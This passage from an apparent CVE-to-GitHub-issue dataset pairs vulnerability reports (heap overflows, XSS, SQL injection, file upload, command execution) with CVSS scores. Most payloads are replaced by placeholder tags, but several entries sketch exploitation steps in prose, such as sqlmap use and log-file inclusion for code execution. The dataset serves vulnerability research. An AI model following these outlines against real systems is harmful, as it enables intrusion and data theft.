fd fd fd fa fa fa fa NUMBERTAG c0c7fff NUMBERTAG fa]fa fa fa fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa NUMBERTAG c0c7fff NUMBERTAG fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING The second bug is same with the above heap overflow bug, which is caused by the dangerous variable APITAG The index \u201cp\u201d is dependent on variable \u201cdp\u201d, and variable \u201cdp\u201d is equal with pool >whatprovidesdata + r >d. If the value of index \u201cp\u201d is bigger than the size of \u201cdecisionmap\u201d, there will be a heap overflow vulnerability. Our APITAG file can make the value of index \u201cp\u201d is bigger than the size of \u201cdecisionmap\u201d. Please reproduce this issue through the following APITAG PATHTAG [resolve_dependencies NUMBERTAG URLTAG If you configure CC with flag fsanitize=address, you will get the following outputs: testcase_read: could not open PATHTAG test NUMBERTAG Transaction summary: str2job: unknown job 'noable NUMBERTAG testtags APITAG ' testcase_read: system: unknown repo 'system' testcase_read: could not open PATHTAG testcase_read: system: unknown repo 'system' str2job: bad line 'in' testcase_read: cannot parse command APITAG test NUMBERTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b8 at pc NUMBERTAG f3afbc2eacd bp NUMBERTAG ffec NUMBERTAG f9f NUMBERTAG sp NUMBERTAG ffec NUMBERTAG f9f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG b8 thread T NUMBERTAG f3afbc2eacc in resolve_dependencies PATHTAG NUMBERTAG f3afbc NUMBERTAG ba4 in solver_run_sat PATHTAG NUMBERTAG f3afbc NUMBERTAG a in solver_solve PATHTAG NUMBERTAG f1eea in main PATHTAG NUMBERTAG f3afac NUMBERTAG bf6 in __libc_start_main PATHTAG NUMBERTAG e6f9 in _start ( PATHTAG NUMBERTAG b8 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG abe NUMBERTAG in calloc PATHTAG NUMBERTAG f3afbd NUMBERTAG f NUMBERTAG in solv_calloc PATHTAG NUMBERTAG f3afbc0ab9a in solver_create PATHTAG NUMBERTAG f3b NUMBERTAG c NUMBERTAG d4 in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f3afac NUMBERTAG bf6 in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in resolve_dependencies Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa]fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING The ASAN outputs information about these overflow bug. And attacker can use this bug to achieve a APITAG attack. Please reproduce and fix these two bugs.",
  74148. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74149. "severity": "MEDIUM",
  74150. "baseScore": 6.5,
  74151. "impactScore": 3.6,
  74152. "exploitabilityScore": 2.8
  74153. },
  74154. {
  74155. "CVE_ID": "CVE-2021-44584",
  74156. "Issue_Url_old": "https://github.com/emlog/emlog/issues/113",
  74157. "Issue_Url_new": "https://github.com/emlog/emlog/issues/113",
  74158. "Repo_new": "emlog/emlog",
  74159. "Issue_Created_At": "2021-11-12T10:12:19Z",
  74160. "description": "emlog pro NUMBERTAG has XSS Vulnerability. APITAG APITAG FILETAG",
  74161. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  74162. "severity": "MEDIUM",
  74163. "baseScore": 6.1,
  74164. "impactScore": 2.7,
  74165. "exploitabilityScore": 2.8
  74166. },
  74167. {
  74168. "CVE_ID": "CVE-2021-44585",
  74169. "Issue_Url_old": "https://github.com/jeecgboot/jeecg-boot/issues/3223",
  74170. "Issue_Url_new": "https://github.com/jeecgboot/jeecg-boot/issues/3223",
  74171. "Repo_new": "jeecgboot/jeecg-boot",
  74172. "Issue_Created_At": "2021-11-30T09:33:40Z",
  74173. "description": "\u53cd\u5c04\u578bXSS NUMBERTAG URLTAG \u622a\u56fe&\u4ee3\u7801\uff1a FILETAG",
  74174. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  74175. "severity": "MEDIUM",
  74176. "baseScore": 6.1,
  74177. "impactScore": 2.7,
  74178. "exploitabilityScore": 2.8
  74179. },
  74180. {
  74181. "CVE_ID": "CVE-2021-44586",
  74182. "Issue_Url_old": "https://github.com/qinming99/dst-admin/issues/28",
  74183. "Issue_Url_new": "https://github.com/qinming99/dst-admin/issues/28",
  74184. "Repo_new": "qinming99/dst-admin",
  74185. "Issue_Created_At": "2021-11-30T11:26:05Z",
  74186. "description": "A security issue. Hi,guys! There is a serious security problem in your code. About a few weeks ago, I found a function point in your website background that can lead to arbitrary file download But it must use a account and password. However, I found a new way to download any file in unauth. That means I can download any file without authorization without using my account and password . Here is the example APITAG Target: URLTAG And the http data is: CODETAG poc: PATHTAG Remember to use burpsuite not browser Have a nice day!",
  74187. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  74188. "severity": "HIGH",
  74189. "baseScore": 7.5,
  74190. "impactScore": 3.6,
  74191. "exploitabilityScore": 3.9
  74192. },
  74193. {
  74194. "CVE_ID": "CVE-2021-44590",
  74195. "Issue_Url_old": "https://github.com/libming/libming/issues/236",
  74196. "Issue_Url_new": "https://github.com/libming/libming/issues/236",
  74197. "Repo_new": "libming/libming",
  74198. "Issue_Created_At": "2021-12-01T06:02:37Z",
  74199. "description": "Memory allocation failure in cws2fws. version: master(commit NUMBERTAG aee NUMBERTAG command: listswf $FILE ERRORTAG A large integer passed to realloc, causing the allocation failure. The detailed call chain analysis is as follows. Download poc URLTAG ERRORTAG",
  74200. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74201. "severity": "MEDIUM",
  74202. "baseScore": 6.5,
  74203. "impactScore": 3.6,
  74204. "exploitabilityScore": 2.8
  74205. },
  74206. {
  74207. "CVE_ID": "CVE-2021-44591",
  74208. "Issue_Url_old": "https://github.com/libming/libming/issues/235",
  74209. "Issue_Url_new": "https://github.com/libming/libming/issues/235",
  74210. "Repo_new": "libming/libming",
  74211. "Issue_Created_At": "2021-12-01T05:31:44Z",
  74212. "description": "Memory allocation failure caused by the missing boundary check in APITAG version: master(commit NUMBERTAG aee NUMBERTAG URLTAG ) command: listswf $FILE ERRORTAG The cause of this bug is the lack of boundary checks. Specifically, in the APITAG function, the size of end and APITAG is not compared when APITAG is called. As a result, APITAG may be a negative integer, which eventually leads to allocation failure. The detailed call chain analysis is as follows. Download poc URLTAG ERRORTAG",
  74213. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74214. "severity": "MEDIUM",
  74215. "baseScore": 6.5,
  74216. "impactScore": 3.6,
  74217. "exploitabilityScore": 2.8
  74218. },
  74219. {
  74220. "CVE_ID": "CVE-2021-44608",
  74221. "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/12",
  74222. "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/12",
  74223. "Repo_new": "alexlang24/bloofoxcms",
  74224. "Issue_Created_At": "2021-12-01T15:46:38Z",
  74225. "description": "APITAG Cross Site Scripting (XSS) APITAG I found two Authenticated Cross Site Scripting in 'file' parameter and 'type' parameter Cross Site Scripting in the parameter 'file' APITAG FILETAG Cross Site Scripting in the parameter 'type' APITAG FILETAG Impact The attacker can execute a HTML/JS Code the attacker can stealing cookies",
  74226. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  74227. "severity": "MEDIUM",
  74228. "baseScore": 5.4,
  74229. "impactScore": 2.7,
  74230. "exploitabilityScore": 2.3
  74231. },
  74232. {
  74233. "CVE_ID": "CVE-2021-44610",
  74234. "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/13",
  74235. "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/13",
  74236. "Repo_new": "alexlang24/bloofoxcms",
  74237. "Issue_Created_At": "2021-12-02T13:03:52Z",
  74238. "description": "Multiple SQL injection vulnerabilities . APITAG NUMBERTAG have no security filtering of user input parameters in the admin center page. resulting in a large number of sql injection vulnerabilities URLTAG We can use sqlmap to validate\uff1a ERRORTAG FILETAG URLTAG CODETAG FILETAG",
  74239. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74240. "severity": "CRITICAL",
  74241. "baseScore": 9.8,
  74242. "impactScore": 5.9,
  74243. "exploitabilityScore": 3.9
  74244. },
  74245. {
  74246. "CVE_ID": "CVE-2021-44667",
  74247. "Issue_Url_old": "https://github.com/alibaba/nacos/issues/7359",
  74248. "Issue_Url_new": "https://github.com/alibaba/nacos/issues/7359",
  74249. "Repo_new": "alibaba/nacos",
  74250. "Issue_Created_At": "2021-12-04T19:23:34Z",
  74251. "description": "This is a XSS vulnerabilities. Nacos has xss vulnerability Trigger condition: no verification required version: Nacos NUMBERTAG payload: APITAG FILETAG",
  74252. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  74253. "severity": "MEDIUM",
  74254. "baseScore": 6.1,
  74255. "impactScore": 2.7,
  74256. "exploitabilityScore": 2.8
  74257. },
  74258. {
  74259. "CVE_ID": "CVE-2021-44684",
  74260. "Issue_Url_old": "https://github.com/dwisiswant0/advisory/issues/5",
  74261. "Issue_Url_new": "https://github.com/dwisiswant0/advisory/issues/5",
  74262. "Repo_new": "dwisiswant0/advisory",
  74263. "Issue_Created_At": "2021-08-05T09:13:27Z",
  74264. "description": "OS Command Injection in huntr ff NUMBERTAG b NUMBERTAG e NUMBERTAG c NUMBERTAG bf NUMBERTAG ec NUMBERTAG a NUMBERTAG Description _TBD_ CVE ID : _N/A_ References _URL_",
  74265. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74266. "severity": "CRITICAL",
  74267. "baseScore": 9.8,
  74268. "impactScore": 5.9,
  74269. "exploitabilityScore": 3.9
  74270. },
  74271. {
  74272. "CVE_ID": "CVE-2021-44685",
  74273. "Issue_Url_old": "https://github.com/dwisiswant0/advisory/issues/3",
  74274. "Issue_Url_new": "https://github.com/dwisiswant0/advisory/issues/3",
  74275. "Repo_new": "dwisiswant0/advisory",
  74276. "Issue_Created_At": "2021-08-05T09:11:06Z",
  74277. "description": "OS Command Injection in huntr NUMBERTAG Description _TBD_ CVE ID : _N/A_ References _URL_",
  74278. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74279. "severity": "CRITICAL",
  74280. "baseScore": 9.8,
  74281. "impactScore": 5.9,
  74282. "exploitabilityScore": 3.9
  74283. },
  74284. {
  74285. "CVE_ID": "CVE-2021-44686",
  74286. "Issue_Url_old": "https://github.com/dwisiswant0/advisory/issues/18",
  74287. "Issue_Url_new": "https://github.com/dwisiswant0/advisory/issues/18",
  74288. "Repo_new": "dwisiswant0/advisory",
  74289. "Issue_Created_At": "2021-11-23T15:34:30Z",
  74290. "description": "APITAG in launchpad NUMBERTAG Description _TBD_ CVE ID : _N/A_ References _URL_",
  74291. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  74292. "severity": "HIGH",
  74293. "baseScore": 7.5,
  74294. "impactScore": 3.6,
  74295. "exploitabilityScore": 3.9
  74296. },
  74297. {
  74298. "CVE_ID": "CVE-2021-44866",
  74299. "Issue_Url_old": "https://github.com/projectworldsofficial/Online-Movie-Ticket-Booking-System-in-php/issues/6",
  74300. "Issue_Url_new": "https://github.com/projectworldsofficial/online-movie-ticket-booking-system-in-php/issues/6",
  74301. "Repo_new": "projectworldsofficial/online-movie-ticket-booking-system-in-php",
  74302. "Issue_Created_At": "2021-12-06T08:59:58Z",
  74303. "description": "SQL Injection vulnerability via the \"id\" parameter in FILETAG . Hey,I think there is a SQL Injection vulnerability in this system. The file FILETAG does not perform input validation on the 'id' paramter. So An attacker can append SQL queries to the input to extract sensitive information from the database. APITAG to the about page: Example: URLTAG APITAG the request to file. Example: GET APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Connection: close Cookie: APITAG Upgrade Insecure Requests NUMBERTAG APITAG APITAG on the file Example:sqlmap r FILETAG dbms=mysql threads NUMBERTAG APITAG sensitive information from the database FILETAG APITAG FILETAG",
  74304. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  74305. "severity": "HIGH",
  74306. "baseScore": 7.5,
  74307. "impactScore": 3.6,
  74308. "exploitabilityScore": 3.9
  74309. },
  74310. {
  74311. "CVE_ID": "CVE-2021-44868",
  74312. "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/58",
  74313. "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/58",
  74314. "Repo_new": "ming-soft/mcms",
  74315. "Issue_Created_At": "2021-12-05T17:24:31Z",
  74316. "description": "MCMS NUMBERTAG PATHTAG hava a SQL Injection Vulnerability. Vulnerability file: PATHTAG Vulnerability tracking path: CODETAG poc ERRORTAG FILETAG",
  74317. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74318. "severity": "CRITICAL",
  74319. "baseScore": 9.8,
  74320. "impactScore": 5.9,
  74321. "exploitabilityScore": 3.9
  74322. },
  74323. {
  74324. "CVE_ID": "CVE-2021-44892",
  74325. "Issue_Url_old": "https://github.com/Stakcery/Web-Security/issues/1",
  74326. "Issue_Url_new": "https://github.com/y4tacker/web-security/issues/1",
  74327. "Repo_new": "y4tacker/web-security",
  74328. "Issue_Created_At": "2021-12-07T13:08:51Z",
  74329. "description": "APITAG has a remote command execution vulnerability. Some time ago I submitted a vulnerability in the Chinese APITAG are the details. You can find this in URLTAG This is due to the combination of two functions(thinkphp) resulting in the command execution ERRORTAG As you know, these two functions are related to template rendering, and this combination has been seen in Chinese APITAG are the utilization details; First we create the route according to the official documentation; At first\uff0ccreate APITAG ERRORTAG then create APITAG APITAG is no need for any content in this like this FILETAG then We need APITAG it can send payload without url encoded characters APITAG FILETAG thinkphp will save access logs APITAG with date FILETAG then we just need to type url below: ERRORTAG success\uff01\uff01\uff01we can contain malicious payloads\uff01\uff01\uff01 FILETAG Next I will explain how this vulnerability was created. The following simplifies my narrative with pictures instead of words FILETAG then We can override the parameters in $this APITAG FILETAG then follow the function display FILETAG follow FILETAG Default parsing engine value is Think FILETAG follow FILETAG Continue, APITAG FILETAG Go to the exec method and call the run method of the APITAG class to process the value of $params with the path to the log file after processing go to APITAG FILETAG in PATHTAG FILETAG Go to the fetch method in the APITAG class, get the path to the cache file, and then go to the load method in Storage FILETAG Follow up to the load method of Storage, the filename is the previously fetched cache storage Document Document path path and var is the array with _filename=path to the log file FILETAG Finally we can include log files with malicious code",
  74330. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  74331. "severity": "HIGH",
  74332. "baseScore": 8.8,
  74333. "impactScore": 5.9,
  74334. "exploitabilityScore": 2.8
  74335. },
  74336. {
  74337. "CVE_ID": "CVE-2021-44906",
  74338. "Issue_Url_old": "https://github.com/substack/minimist/issues/164",
  74339. "Issue_Url_new": "https://github.com/substack/minimist/issues/164",
  74340. "Repo_new": "substack/minimist",
  74341. "Issue_Created_At": "2022-03-15T03:02:02Z",
  74342. "description": "insufficient fix for prototype pollution in APITAG Despite the fix in URLTAG , there is still a way to exploit prototype pollution vulnerability. More specifically, there are handlers for prototypes of Object, String and Number, but no handler for the APITAG This prototype can be accessed through the default \u201c_\u201d property in the parsed arguments, which is an array. If the app developer sets properties on function objects (use case discussed here: URLTAG ), this can lead to undesired behavior.",
  74343. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74344. "severity": "CRITICAL",
  74345. "baseScore": 9.8,
  74346. "impactScore": 5.9,
  74347. "exploitabilityScore": 3.9
  74348. },
  74349. {
  74350. "CVE_ID": "CVE-2021-44906",
  74351. "Issue_Url_old": "https://github.com/minimistjs/minimist/issues/11",
  74352. "Issue_Url_new": "https://github.com/minimistjs/minimist/issues/11",
  74353. "Repo_new": "minimistjs/minimist",
  74354. "Issue_Created_At": "2022-10-19T14:23:14Z",
  74355. "description": "Backport of NUMBERTAG fixes to NUMBERTAG Thanks to the new maintainers for taking over this project. I see a new version of the NUMBERTAG line has been published even though it still _seems_ to be covered by CVETAG URLTAG . Is there any possibility of the FILETAG being backported, or is it necessary at all? I ask because the maintainers of one of the other packages we use have thus far not responded to suggestions to update URLTAG and a patch update to the NUMBERTAG line would obviate the need for that. And yes, I'm aware we can also use yarn resolutions, NPM overrides, etc. and the risk is probably fairly minimal in our use case \u2013 but I assume there's a reason the NUMBERTAG line is being maintained.",
  74356. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74357. "severity": "CRITICAL",
  74358. "baseScore": 9.8,
  74359. "impactScore": 5.9,
  74360. "exploitabilityScore": 3.9
  74361. },
  74362. {
  74363. "CVE_ID": "CVE-2021-44908",
  74364. "Issue_Url_old": "https://github.com/balderdashy/sails/issues/7209",
  74365. "Issue_Url_new": "https://github.com/balderdashy/sails/issues/7209",
  74366. "Repo_new": "balderdashy/sails",
  74367. "Issue_Created_At": "2022-03-15T03:02:07Z",
  74368. "description": "Prototype pollution in APITAG Node version NUMBERTAG Sails version _(sails NUMBERTAG else if statement in lines NUMBERTAG URLTAG is vulnerable to prototype pollution. The object assignment on line NUMBERTAG may lead to denial of service or property injection if APITAG based application dynamically controls the value of variable APITAG Proof of concept case is demonstrated here: URLTAG",
  74369. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74370. "severity": "CRITICAL",
  74371. "baseScore": 9.8,
  74372. "impactScore": 5.9,
  74373. "exploitabilityScore": 3.9
  74374. },
  74375. {
  74376. "CVE_ID": "CVE-2021-44911",
  74377. "Issue_Url_old": "https://github.com/xpressengine/xe-core/issues/2434",
  74378. "Issue_Url_new": "https://github.com/xpressengine/xe-core/issues/2434",
  74379. "Repo_new": "xpressengine/xe-core",
  74380. "Issue_Created_At": "2021-12-08T00:38:20Z",
  74381. "description": "Unrestricted file upload vulnerability in Latest Release NUMBERTAG Affected version: XE before NUMBERTAG ulnerable file: PATHTAG menu_active_btn Causes of vulnerability: FILETAG When uploading the Mouse over button and When selected button , there is no restriction on the file suffix, which leads to any file uploading to the files directory. Since .htaccess only restricts the PHP type, uploading HTML type files leads to stored XSS vulnerabilities. If the .htaccess configuration is improper, for example before the XE NUMBERTAG ersion, you can upload the PHP type file to GETSHELL. deny access to files that may contain sensitive information APITAG ^(. APITAG FILETAG Repair suggestion: add the html file to the upload blacklist.",
  74382. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  74383. "severity": "MEDIUM",
  74384. "baseScore": 5.4,
  74385. "impactScore": 2.7,
  74386. "exploitabilityScore": 2.3
  74387. },
  74388. {
  74389. "CVE_ID": "CVE-2021-44912",
  74390. "Issue_Url_old": "https://github.com/xpressengine/xe-core/issues/2433",
  74391. "Issue_Url_new": "https://github.com/xpressengine/xe-core/issues/2433",
  74392. "Repo_new": "xpressengine/xe-core",
  74393. "Issue_Created_At": "2021-12-08T00:36:19Z",
  74394. "description": "Unrestricted file upload vulnerability in Latest Release NUMBERTAG APITAG Affected version: XE before NUMBERTAG ulnerable file: PATHTAG menu_normal_btn Causes of vulnerability: FILETAG When uploading the Normal button, there is no restriction on the file suffix, which leads to any file uploading to the files directory. Since .htaccess only restricts the PHP type, uploading HTML type files leads to stored XSS vulnerabilities. If the .htaccess configuration is improper, for example before the XE NUMBERTAG ersion, you can upload the PHP type file to GETSHELL. CODETAG FILETAG Repair suggestion: add the \\ html\\ file to the upload blacklist.",
  74395. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  74396. "severity": "MEDIUM",
  74397. "baseScore": 5.4,
  74398. "impactScore": 2.7,
  74399. "exploitabilityScore": 2.3
  74400. },
  74401. {
  74402. "CVE_ID": "CVE-2021-44915",
  74403. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/8",
  74404. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/8",
  74405. "Repo_new": "taogogo/taocms",
  74406. "Issue_Created_At": "2021-12-07T08:51:23Z",
  74407. "description": "There is SQL blind injection at APITAG APITAG administrator authority). Log in to the background as the default account admin. FILETAG We click in order and grab packets: FILETAG FILETAG FILETAG There is a time based blind SQL injection vulnerability in the location of id. FILETAG FILETAG POC: FILETAG APITAG AND (SELECT NUMBERTAG FROM APITAG AND APITAG sqlmap: Save the HTTP request package as a file . FILETAG Test using the APITAG tool : FILETAG",
  74408. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  74409. "severity": "HIGH",
  74410. "baseScore": 7.2,
  74411. "impactScore": 5.9,
  74412. "exploitabilityScore": 1.2
  74413. },
  74414. {
  74415. "CVE_ID": "CVE-2021-44918",
  74416. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1968",
  74417. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1968",
  74418. "Repo_new": "gpac/gpac",
  74419. "Issue_Created_At": "2021-12-10T14:52:20Z",
  74420. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result poc NUMBERTAG ERRORTAG poc NUMBERTAG ERRORTAG gdb poc NUMBERTAG CODETAG poc NUMBERTAG CODETAG",
  74421. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74422. "severity": "MEDIUM",
  74423. "baseScore": 5.5,
  74424. "impactScore": 3.6,
  74425. "exploitabilityScore": 1.8
  74426. },
  74427. {
  74428. "CVE_ID": "CVE-2021-44919",
  74429. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1963",
  74430. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1963",
  74431. "Repo_new": "gpac/gpac",
  74432. "Issue_Created_At": "2021-12-10T09:54:17Z",
  74433. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb ERRORTAG",
  74434. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74435. "severity": "MEDIUM",
  74436. "baseScore": 5.5,
  74437. "impactScore": 3.6,
  74438. "exploitabilityScore": 1.8
  74439. },
  74440. {
  74441. "CVE_ID": "CVE-2021-44920",
  74442. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1957",
  74443. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1957",
  74444. "Repo_new": "gpac/gpac",
  74445. "Issue_Created_At": "2021-12-10T08:00:30Z",
  74446. "description": "Invalid memory address dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
  74447. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74448. "severity": "MEDIUM",
  74449. "baseScore": 5.5,
  74450. "impactScore": 3.6,
  74451. "exploitabilityScore": 1.8
  74452. },
  74453. {
  74454. "CVE_ID": "CVE-2021-44921",
  74455. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1964",
  74456. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1964",
  74457. "Repo_new": "gpac/gpac",
  74458. "Issue_Created_At": "2021-12-10T10:59:02Z",
  74459. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result CODETAG gdb CODETAG",
  74460. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74461. "severity": "MEDIUM",
  74462. "baseScore": 5.5,
  74463. "impactScore": 3.6,
  74464. "exploitabilityScore": 1.8
  74465. },
  74466. {
  74467. "CVE_ID": "CVE-2021-44922",
  74468. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1969",
  74469. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1969",
  74470. "Repo_new": "gpac/gpac",
  74471. "Issue_Created_At": "2021-12-10T15:21:14Z",
  74472. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG APITAG CODETAG CODETAG",
  74473. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74474. "severity": "MEDIUM",
  74475. "baseScore": 5.5,
  74476. "impactScore": 3.6,
  74477. "exploitabilityScore": 1.8
  74478. },
  74479. {
  74480. "CVE_ID": "CVE-2021-44923",
  74481. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1962",
  74482. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1962",
  74483. "Repo_new": "gpac/gpac",
  74484. "Issue_Created_At": "2021-12-10T09:31:57Z",
  74485. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb ERRORTAG",
  74486. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74487. "severity": "MEDIUM",
  74488. "baseScore": 5.5,
  74489. "impactScore": 3.6,
  74490. "exploitabilityScore": 1.8
  74491. },
  74492. {
  74493. "CVE_ID": "CVE-2021-44924",
  74494. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1959",
  74495. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1959",
  74496. "Repo_new": "gpac/gpac",
  74497. "Issue_Created_At": "2021-12-10T08:26:37Z",
  74498. "description": "Infinite loop in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result CODETAG gdb CODETAG",
  74499. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74500. "severity": "MEDIUM",
  74501. "baseScore": 5.5,
  74502. "impactScore": 3.6,
  74503. "exploitabilityScore": 1.8
  74504. },
  74505. {
  74506. "CVE_ID": "CVE-2021-44925",
  74507. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1967",
  74508. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1967",
  74509. "Repo_new": "gpac/gpac",
  74510. "Issue_Created_At": "2021-12-10T14:38:22Z",
  74511. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
  74512. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74513. "severity": "MEDIUM",
  74514. "baseScore": 5.5,
  74515. "impactScore": 3.6,
  74516. "exploitabilityScore": 1.8
  74517. },
  74518. {
  74519. "CVE_ID": "CVE-2021-44926",
